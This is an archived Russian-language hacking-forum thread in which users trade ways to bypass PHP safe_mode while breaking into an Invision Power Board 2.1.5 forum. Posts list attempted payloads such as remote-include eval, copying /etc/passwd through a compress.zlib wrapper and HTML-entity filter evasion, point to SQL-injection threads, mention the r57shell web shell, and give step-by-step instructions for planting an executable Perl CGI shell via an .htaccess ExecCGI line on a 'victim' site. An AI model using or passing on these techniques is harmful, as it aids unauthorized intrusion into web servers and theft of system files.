PDA

Просмотр полной версии : Обход Safe Mode прл взломе Invision Power board


1ten0.0net1
07.09.2006, 09:03
Прошу совета - есть в наличии 2.1.5 IPB форум.
Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE.
Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <======
в созданном посте.
Пробовал:
eval (include(http://lalalal));//'
Пробовал eval(file_get_contents());//'
Пробовал
copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");
Пробовал обходить фильтрацию при помощи &#NN;
но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы.
Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете?
У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5

Заранее, благодарю.

SanyaX
07.09.2006, 10:18
В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.

blackybr
07.09.2006, 13:18
если на файле +w то иногда может прокатить

<?
$file = '';
$cont = '';
$handle = fopen($filename, 'w');
fwrite($handle, $comecontent);
fclose($handle);
?>

$file – имя файла
$cont – то, что пишем в файл



https://forum.antichat.ru/thread17281-2.1.5+sql.html
https://forum.antichat.ru/thread18495-2.1.5+sql.html

MegaBits
20.12.2006, 23:49
У меня таже проблема залил r57shell v 1.31 там есть несколько встроенных способов обхода, но не один не пашет, что можете посоветовать.

Zazil
22.12.2006, 16:34
Попробуй следующим образом.
Находим директорию в которую можно писать и доступную по ввв.
Создаем там файл .htaccess со строчкой Options +ExecCGI внутри.
Заливаем шелл туда же какойнить перловый шелл.
Далее делаем ему chmod +x shell.cgi
Потом пытаемся вызвать его из броузера.
hxxt://victim.com/blablabla/shell.cgi

У меня получалось обойти safe_mode таким способом.